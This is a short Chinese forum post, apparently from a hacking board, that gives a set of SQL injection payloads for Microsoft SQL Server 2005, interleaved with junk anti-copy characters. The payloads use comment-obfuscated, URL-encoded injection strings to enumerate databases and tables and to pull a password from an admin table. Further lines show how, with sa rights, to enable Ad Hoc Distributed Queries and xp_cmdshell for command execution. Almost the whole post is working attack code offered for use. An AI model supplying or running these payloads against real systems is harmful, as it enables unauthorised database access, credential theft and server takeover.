MSsql2005注入语句

admin

, E6 R$ F) k! w4 U% p1 M

[Copy to clipboard]CODE:
$ K! L4 V7 a, y: G/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--

爆表语句,somedb部份是所要列的数据库，红色数字1累加
6 m: S- z% {4 B) U

( q, a7 P' K. C/ J: U[Copy to clipboard]CODE:
, \0 O! t, \5 {/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
3 I4 l, Z) b7 W/ p7 }- y9 r7 s" j
爆字段语句，爆表admin里user='icerover'的密码段


: X$ U) D/ V' Z/ N) P[Copy to clipboard]CODE:
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

mssql2005默认没有开xp_cmdshell的，openrowset也不能用
7 a  D& |; p; d: p7 a如果是sa权限，可以这样来开启
开启openrowset
; T6 ^6 R' k& }1 |! s2 n0 l
0 s4 m1 n2 w1 Y
' H2 A% Y) S  `2 u$ ][Copy to clipboard]CODE:
! ^/ ^8 m8 @( B# H: s, G' J" |/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/ x+ `- _7 o' r1 }1 {9 D" _/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--

开启xp_cmdshell
: @6 p: A3 V5 c9 l% r% ^
# [) b9 D. \$ T6 C1 O2 I: D
! Q( E$ ^; D9 N1 D[Copy to clipboard]CODE:
4 [: q% j2 N5 D8 [. N* R0 B. ZEXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
$ a! X: H, v$ s8 r5 t( M: r
ok,over~~晚安